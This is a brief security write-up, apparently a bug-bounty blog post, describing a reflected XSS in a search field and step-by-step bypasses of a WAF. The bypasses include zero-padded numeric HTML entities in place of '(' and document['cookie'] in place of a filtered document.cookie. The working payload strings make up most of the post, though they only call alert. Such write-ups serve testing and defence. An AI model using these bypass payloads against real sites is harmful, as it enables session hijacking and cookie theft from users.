BOOK THIS SPACE FOR AD
ARTICLE ADHi!, in this article I want to share my finding about reflected XSS and some way for bypassing 403 Forbidden.
Firstly, what is XSS vulnerability?
XSS (Cross Site Scripting)XSS or Cross Site Scripting is web vulnerability in client-side where the attacker able to injects malisious code to the browser, usually via input form (like search and another field). Attacker can stealing victim cookies, data, or even the session so attacker can login as a victim without need authentication (worst case).
In my case, vulnerability occurs in search field. There’s no filter for user to input tag “<>” character, so it’s basically can filled by html or javascript code then it’s executed as html injection or javascript injection (XSS). But, even that, I got that some pattern or character was forbidden as it leads to 403 forbidden status.
My first payload is : testtest”+onmouseover%3D”alert(1) then it’s got blocked by WAF (403 forbidden)
Then, I try to analyze what is the letter/character/pattern actually blocked and forbids by WAF. So, I try it step by step :
testtest”+onmouseover → 200 ok
testtest”+onmouseover%3D → 200 ok
testtest”+onmouseover%3D”alert → 200 ok, and so on (This is one of my classic technique when trying bypassing :D )
Until I found the character that leads my payload got blocked, it’s “(” character when I try to close argument of alert parameter. It looks like :
testtest”+onmouseover%3D”alert(1) → 403 forbidden, blocked by WAF
but, testtest”+onmouseover%3D”alert1) → 200 ok, still fine :D
So, I try to bypass “(” character with HTML entities numeric by replacing “(” with (
**NB : You can check HTML Entities for another characters in https://tools.w3cub.com/html-entitiestesttest”+onmouseover%3D”alert(1) → invalid payload because after “&” character the text will be ignored or removed
Then, try to encode ( with url encode :
testtest”+onmouseover%3D”alert%26%2340%3B1) → 403 forbidden, blocked by WAF
**You can use this site for url encoding : https://www.urlencoder.io/Then, I remembered a write up that bypassing WAF for XSS with add “00” or “%00” in the middle of payload, so I try modify the payload again :
testtest”+onmouseover%3D”alert%26%230040%3B1) → still blocked
testtest”+onmouseover%3D”alert%26%230000000040%3B1) → 200 ok (Nice…)
Finally, I bypassed it after adding “0” 8 times (8x) like above payload.
Then, I try to access document cookie, but the text “document.cookie” of payload removed by site, it looks like there’s another security mechanism.
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument.cookie) → 200 ok, but…
it become to :
testtest” onmouseover=”alert([removed])
So, I modified again the payload by changing document.cookie to document[‘cookie’]
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’]) → 200 ok and payload was triggered
Thank you.